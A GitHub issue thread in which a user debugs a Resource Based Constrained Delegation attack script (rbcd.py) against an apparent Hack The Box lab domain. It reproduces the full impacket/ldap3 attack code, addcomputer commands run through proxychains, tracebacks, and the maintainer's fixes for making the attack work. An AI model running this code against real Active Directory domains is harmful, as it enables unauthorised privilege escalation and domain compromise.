### ISSUE TITLE
Keep getting error

### ISSUE THREAD

**Issue by Chantal2019** [tothi/rbcd-attack#2]
```
proxychains addcomputer.py -computer-name 'fakecomputer$' -computer-pass thisisatest -dc-ip 192.168.3.203 htb.local/test-svc:'******'
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:1080-<><>-192.168.3.203:135-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.3.203:445-<><>-OK
[*] Successfully added machine account fakecomputer$ with password thisisatest.
```

```
ProxyChains-3.1 (http://proxychains.sf.net)
[*] Starting Resource Based Constrained Delegation Attack against WEB$
[*] Initializing LDAP connection to 192.168.3.203
[*] Using htb.local\test-svc account with password ***
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.3.203:389-<><>-OK
[*] LDAP bind OK
[*] Initializing domainDumper()
Traceback (most recent call last):
  File "rbcd.py", line 40, in <module>
    dd = ldapdomaindump.domainDumper(serv, conn, cnf)
  File "/usr/lib/python3/dist-packages/ldapdomaindump/__init__.py", line 162, in __init__
    self.root = self.getRoot()
  File "/usr/lib/python3/dist-packages/ldapdomaindump/__init__.py", line 175, in getRoot
    return self.server.info.other['defaultNamingContext'][0]
AttributeError: 'NoneType' object has no attribute 'other'
```

```
and this is how I modified the code:

!/usr/bin/env python3
#
# Resource Based Constraint Delegation Attack
# 

import ldap3
import ldapdomaindump
from impacket import logging
from impacket.examples import logger
from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig

attackeraccount = ('htb.local\\test-svc', '****)
fakecomputer = 'fakecomputer$'
targetcomputer = 'WEB'
dc = '192.168.3.203'

targetsam = '{}$'.format(targetcomputer)
fakecomputersam = '{}$'.format(fakecomputer)

c = NTLMRelayxConfig()
c.addcomputer = fakecomputer
c.target = dc

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam))

logging.info('Initializing LDAP connection to {}'.format(dc))
#tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2)
serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL)
logging.info('Using {} account with password ***'.format(attackeraccount[0]))
conn = ldap3.Connection(serv, user=attackeraccount[0], password=attackeraccount[1], authentication=ldap3.SIMPLE)
conn.bind()
logging.info('LDAP bind OK')

logging.info('Initializing domainDumper()')
cnf = ldapdomaindump.domainDumpConfig()
cnf.basepath = c.lootdir
dd = ldapdomaindump.domainDumper(serv, conn, cnf)

logging.info('Initializing LDAPAttack()')
la = LDAPAttack(c, conn, attackeraccount[0].replace('\\', '/'))

logging.info('Writing SECURITY_DESCRIPTOR related to `{}` fake computer into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `{}`'.format(fakecomputer, targetcomputer))
la.delegateAttack(fakecomputersam, targetsam, dd, sid=None)
```

**Comment by tothi** [comment]
impacket seems to be recent, but probably the dependencies (maybe ldapdomaindump) are not.
recommend trying it in a dedicated python3 virtualenv. (with `pip install impacket`)

**Comment by Chantal2019** [comment]
I made sure I have all the dependencies and now I am getting this error
`root@kali:~/HADES/rbcd-attack# python3 rbcd.py 
[*] Starting Resource Based Constrained Delegation Attack against WEB$
[*] Initializing LDAP connection to 192.168.3.203
[*] Using dev\test-svc account with password ***
Traceback (most recent call last):
  File "rbcd.py", line 34, in <module>
    conn.bind()
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 524, in bind
    self.open(read_server_info=False)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/sync.py", line 56, in open
    BaseStrategy.open(self, reset_usage, read_server_info)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 147, in open
    raise LDAPSocketOpenError('unable to open socket', exception_history)
ldap3.core.exceptions.LDAPSocketOpenError: ('unable to open socket', [(LDAPSocketOpenError('socket connection error while opening: [Errno 111] Connection refused'), ('192.168.3.203', 389))])
root@kali:~/HADES/rbcd-attack# python3 rbcd.py 
[*] Starting Resource Based Constrained Delegation Attack against WEB$
[*] Initializing LDAP connection to 192.168.3.203
[*] Using dev.htb.local\test-svc account with password ***
Traceback (most recent call last):
  File "rbcd.py", line 34, in <module>
    conn.bind()
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 524, in bind
    self.open(read_server_info=False)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/sync.py", line 56, in open
    BaseStrategy.open(self, reset_usage, read_server_info)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 147, in open
    raise LDAPSocketOpenError('unable to open socket', exception_history)
ldap3.core.exceptions.LDAPSocketOpenError: ('unable to open socket', [(LDAPSocketOpenError('socket connection error while opening: [Errno 111] Connection refused'), ('192.168.3.203', 389))])``

**Comment by Chantal2019** [comment]
Now I am getting this error:

```
root@kali:~/HADES/rbcd-attack# python3 rbcd.py 
[*] Starting Resource Based Constrained Delegation Attack against WEB$
[*] Initializing LDAP connection to 192.168.3.203
[*] Using dev\test-svc account with password ***
Traceback (most recent call last):
  File "rbcd.py", line 34, in <module>
    conn.bind()
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 524, in bind
    self.open(read_server_info=False)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/sync.py", line 56, in open
    BaseStrategy.open(self, reset_usage, read_server_info)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 147, in open
    raise LDAPSocketOpenError('unable to open socket', exception_history)
ldap3.core.exceptions.LDAPSocketOpenError: ('unable to open socket', [(LDAPSocketOpenError('socket connection error while opening: [Errno 111] Connection refused'), ('192.168.3.203', 389))])
root@kali:~/HADES/rbcd-attack# python3 rbcd.py 
[*] Starting Resource Based Constrained Delegation Attack against WEB$
[*] Initializing LDAP connection to 192.168.3.203
[*] Using dev.htb.local\test-svc account with password ***
Traceback (most recent call last):
  File "rbcd.py", line 34, in <module>
    conn.bind()
  File "/usr/lib/python3/dist-packages/ldap3/core/connection.py", line 524, in bind
    self.open(read_server_info=False)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/sync.py", line 56, in open
    BaseStrategy.open(self, reset_usage, read_server_info)
  File "/usr/lib/python3/dist-packages/ldap3/strategy/base.py", line 147, in open
    raise LDAPSocketOpenError('unable to open socket', exception_history)
ldap3.core.exceptions.LDAPSocketOpenError: ('unable to open socket', [(LDAPSocketOpenError('socket connection error while opening: [Errno 111] Connection refused'), ('192.168.3.203', 389))])
```

**Comment by Chantal2019** [comment]
please help me to fix this as I also really want to get it with your script as well. This is my conf:

```
!/usr/bin/env python3
#
# Resource Based Constraint Delegation Attack
# 

import ldap3
import ldapdomaindump
from impacket import logging
from impacket.examples import logger
from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig

attackeraccount = ('dev.htb.local\\test-svc', '******')
fakecomputer = 'fakecomputer$'
targetcomputer = 'WEB'
dc = '192.168.3.203'

targetsam = '{}$'.format(targetcomputer)
fakecomputersam = '{}$'.format(fakecomputer)

c = NTLMRelayxConfig()
c.addcomputer = fakecomputer
c.target = dc

logger.init()
logging.getLogger().setLevel(logging.INFO)
logging.info('Starting Resource Based Constrained Delegation Attack against {}'.format(targetsam))

logging.info('Initializing LDAP connection to {}'.format(dc))
#tls = ldap3.Tls(validate=ssl.CERT_NONE, version=ssl.PROTOCOL_TLSv1_2)
serv = ldap3.Server(dc, tls=False, get_info=ldap3.ALL)
logging.info('Using {} account with password ***'.format(attackeraccount[0]))
conn = ldap3.Connection(serv, user=attackeraccount[0], password=attackeraccount[1], authentication=ldap3.SIMPLE)
conn.bind()
logging.info('LDAP bind OK')

logging.info('Initializing domainDumper()')
cnf = ldapdomaindump.domainDumpConfig()
cnf.basepath = c.lootdir
dd = ldapdomaindump.domainDumper(serv, conn, cnf)

logging.info('Initializing LDAPAttack()')
la = LDAPAttack(c, conn, attackeraccount[0].replace('\\', '/'))

logging.info('Writing SECURITY_DESCRIPTOR related to `{}` fake computer into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `{}`'.format(fakecomputer, targetcomputer))
la.delegateAttack(fakecomputersam, targetsam, dd, sid=None)
```

**Comment by Chantal2019** [comment]
```
root@kali:~/HADES/rbcd-attack# pip3 install impacket
Requirement already satisfied: impacket in /usr/local/lib/python3.8/dist-packages (0.9.22.dev1+20200428.191254.96c7a512)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket) (3.6.1)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket) (1.1.2)
Requirement already satisfied: pyOpenSSL>=0.13.1 in /usr/lib/python3/dist-packages (from impacket) (19.1.0)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket) (0.9.1)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket) (1.14.0)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket) (2.5.1)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket) (0.4.2)

```

**Comment by Chantal2019** [comment]
```
root@kali:~/HADES/ldapdomaindump# pip3 install ldapdomaindump
Requirement already satisfied: ldapdomaindump in /usr/local/lib/python3.8/dist-packages/ldapdomaindump-0.9.2-py3.8.egg (0.9.2)
Requirement already satisfied: dnspython in /usr/lib/python3/dist-packages (from ldapdomaindump) (1.16.0)
Requirement already satisfied: future in /usr/lib/python3/dist-packages (from ldapdomaindump) (0.18.2)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from ldapdomaindump) (2.5.1)
```

**Comment by Chantal2019** [comment]
and I am running Kali 2020

**Comment by Johnmadrid2456** [comment]
I have the same problem! using Kali 2020! I did pip3 install impacket

please some one help

**Comment by Chantal2019** [comment]
I also ran it in virtualenv :

```
env  rbcd-attack.png  rbcd.py  README.md  venv  virtualenvironment
(project_1) root@kali:~/HADES/rbcd-attack# proxychains python3 rbcd.py
ProxyChains-3.1 (http://proxychains.sf.net)
Traceback (most recent call last):
  File "rbcd.py", line 6, in <module>
    import ldap3
ModuleNotFoundError: No module named 'ldap3'
```

**Comment by Chantal2019** [comment]
also I tried in kali 2019 an got this new error lol

```
[*] Initializing domainDumper()
Traceback (most recent call last):
  File "rbcd.py", line 40, in <module>
    dd = ldapdomaindump.domainDumper(serv, conn, cnf)
  File "/usr/lib/python3/dist-packages/ldapdomaindump/init.py", line 162, in init
    self.root = self.getRoot()
  File "/usr/lib/python3/dist-packages/ldapdomaindump/init.py", line 175, in getRoot
    return self.server.info.other['defaultNamingContext'][0]
AttributeError: 'NoneType' object has no attribute 'other
```

**Comment by Chantal2019** [comment]
the tool is not working guys

**Comment by tothi** [comment]
if it complains about missing modules your installation is broken.
i've tested everything using up-to-date arch linux (with blackarch repositories included).
in a properly set up python3 venv it should work because every dependency is python.
`pip install ldap3` here (in your venv) should install the missing ldap3 module.

> I also ran it in virtualenv :
> 
> ```
> env  rbcd-attack.png  rbcd.py  README.md  venv  virtualenvironment
> (project_1) root@kali:~/HADES/rbcd-attack# proxychains python3 rbcd.py
> ProxyChains-3.1 (http://proxychains.sf.net)
> Traceback (most recent call last):
>   File "rbcd.py", line 6, in <module>
>     import ldap3
> ModuleNotFoundError: No module named 'ldap3'
> ```

**Comment by tothi** [comment]
the computernames in the script must not have `$` at the end. (only the sam account names of the computers have an added `$` at the end.)

> ```
> !/usr/bin/env python3
> #
> # Resource Based Constraint Delegation Attack
> # 
> 
> import ldap3
> import ldapdomaindump
> from impacket import logging
> from impacket.examples import logger
> from impacket.examples.ntlmrelayx.attacks.ldapattack import LDAPAttack
> from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
> 
> attackeraccount = ('htb.local\\test-svc', '****)
> fakecomputer = 'fakecomputer$'
> targetcomputer = 'WEB'
> dc = '192.168.3.203'
> 
> targetsam = '{}$'.format(targetcomputer)
> fakecomputersam = '{}$'.format(fakecomputer)
> 
> ```

**Comment by tothi** [comment]
it is working. ;)

> the tool is not working guys

**Comment by Chantal2019** [comment]
tothi! Thank you so much for trying to solve this! I tried freshly installed kali 2020 and python 3!

this is only error I get now:

```
roxyChains-3.1 (http://proxychains.sf.net)
[*] Starting Resource Based Constrained Delegation Attack against WEB$
[*] Initializing LDAP connection to 192.168.3.203
[*] Using htb.local\test-svc account with password ***
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.3.203:389-<><>-OK
[*] LDAP bind OK
[*] Initializing domainDumper()
Traceback (most recent call last):
  File "rbcd.py", line 40, in <module>
    dd = ldapdomaindump.domainDumper(serv, conn, cnf)
  File "/usr/local/lib/python3.8/dist-packages/ldapdomaindump-0.9.2-py3.8.egg/ldapdomaindump/__init__.py", line 166, in __init__
    self.root = self.getRoot()
  File "/usr/local/lib/python3.8/dist-packages/ldapdomaindump-0.9.2-py3.8.egg/ldapdomaindump/__init__.py", line 179, in getRoot
    return self.server.info.other['defaultNamingContext'][0]
AttributeError: 'NoneType' object has no attribute 'other'
root@kali:~/HADES/rbcd-attack# 
```

**Comment by Chantal2019** [comment]
and in my venv:

```
(project_1) root@kali:~/HADES/rbcd-attack# proxychains python3 rbcd.py 
ProxyChains-3.1 (http://proxychains.sf.net)
[*] Starting Resource Based Constrained Delegation Attack against WEB$
[*] Initializing LDAP connection to 192.168.3.203
[*] Using htb.local\test-svc account with password ***
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.3.203:389-<><>-OK
[*] LDAP bind OK
[*] Initializing domainDumper()
Traceback (most recent call last):
  File "rbcd.py", line 40, in <module>
    dd = ldapdomaindump.domainDumper(serv, conn, cnf)
  File "/root/HADES/rbcd-attack/virtualenvironment/project_1/lib/python3.8/site-packages/ldapdomaindump/__init__.py", line 166, in __init__
    self.root = self.getRoot()
  File "/root/HADES/rbcd-attack/virtualenvironment/project_1/lib/python3.8/site-packages/ldapdomaindump/__init__.py", line 179, in getRoot
    return self.server.info.other['defaultNamingContext'][0]
AttributeError: 'NoneType' object has no attribute 'other'
(project_1) root@kali:~/HADES/rbcd-attack# 

```

**Comment by tothi** [comment]
fyi: pushed an update with options in the script and clearer example. note, that the identity format for `rbcd.py` must be domain\user:pass where domain is the NetBIOS domain name.

**Comment by Chantal2019** [comment]
this is not working! I also asked other HTB players to test it and they got the same error both in kali 2020 and 2019:

root@kali:~/HADES/rbcd-attack# proxychains python3 rbcd.py dev.htb.local\test-svc:'*****' -dc-ip 192.168.3.203 -t test-svc -f fakecomputer 
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation

```
[*] Starting Resource Based Constrained Delegation Attack against test-svc$
[*] Initializing LDAP connection to 192.168.3.203
[*] Using dev.htb.localtest-svc account with password ***
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.3.203:389-<><>-OK
[*] LDAP bind OK
[*] Initializing domainDumper()
Traceback (most recent call last):
  File "rbcd.py", line 53, in <module>
    dd = ldapdomaindump.domainDumper(serv, conn, cnf)
  File "/usr/local/lib/python3.8/dist-packages/ldapdomaindump-0.9.2-py3.8.egg/ldapdomaindump/__init__.py", line 166, in __init__
    self.root = self.getRoot()
  File "/usr/local/lib/python3.8/dist-packages/ldapdomaindump-0.9.2-py3.8.egg/ldapdomaindump/__init__.py", line 179, in getRoot
    return self.server.info.other['defaultNamingContext'][0]
AttributeError: 'NoneType' object has no attribute 'other'
```

**Comment by tothi** [comment]
please dont turn this place into a htb forum. ;)
btw, your identity definition is surely wrong. as i said, you should use netbios domain name prefix.
